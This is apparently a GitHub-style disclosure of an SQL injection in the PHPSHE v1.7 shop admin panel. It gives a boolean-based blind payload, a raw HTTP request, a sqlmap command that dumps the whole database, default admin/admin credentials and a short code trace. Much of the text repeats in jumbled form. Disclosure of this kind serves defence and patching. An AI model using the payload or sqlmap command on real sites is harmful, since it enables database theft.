Parameter: state (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: mod=order&state=wtuan' AND 3809=(SELECT (CASE WHEN (3809=3809) THEN 3809 ELSE (SELECT 6050 UNION SELECT 8971) END))-- LULI
GET /phpshe1.7/admin.php?mod=order&state=wtuan HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=XDEBUG_ECLIPSE; PHPSESSID=f29hn1a9eo2g3o2qcdq1241hf0
Upgrade-Insecure-Requests: 1
Vulnerability identification The solution
Background avoid parameter splicing.
Code audit:
Local environment. GET /phpshe1.7/admin.php?mod=order&state=wtuan
The admin.php line 87 execution flow introduces the order.php line 220 pe_selectall function to count the order list.
The pe_selectall function is defined on line 208 of db.class.php.
The Pe_selectall function handles conditional statements through the _dowhere function,The sql_selectall function displays the number of transactions per page.The malicious SQL is spliced in the _dowhere function.Last injection successful.
The text was updated successfully, but these errors were encountered:
Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) the website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Detection time:
January 6, 2019
Vulnerability description:
Lingbao Jianhao network technology co., LTD. PHPSHE cms system background - SQL injection vulnerability.
POC and validation
Local setup environment:
1, download PHPSHE V1.7 cms system at http://www.phpshe.com/down/phpshe1.7.rar
2, the background to http://localhost/phpshe1.7/admin.php, the password is admin/admin
Vulnerability injection point:
Vulnerability verification method:
python sqlmap.py -r 22.txt --batch -o --dbms=mysql --level 3 -a22. TXT file contents:
Vulnerability identification


The solution
Background avoid parameter splicing.
Code audit:




Local environment.
GET /phpshe1.7/admin.php?mod=order&state=wtuanThe admin.php line 87 execution flow introduces the order.php line 220 pe_selectall function to count the order list.
The pe_selectall function is defined on line 208 of db.class.php.
The Pe_selectall function handles conditional statements through the _dowhere function,The sql_selectall function displays the number of transactions per page.The malicious SQL is spliced in the _dowhere function.Last injection successful.
The text was updated successfully, but these errors were encountered: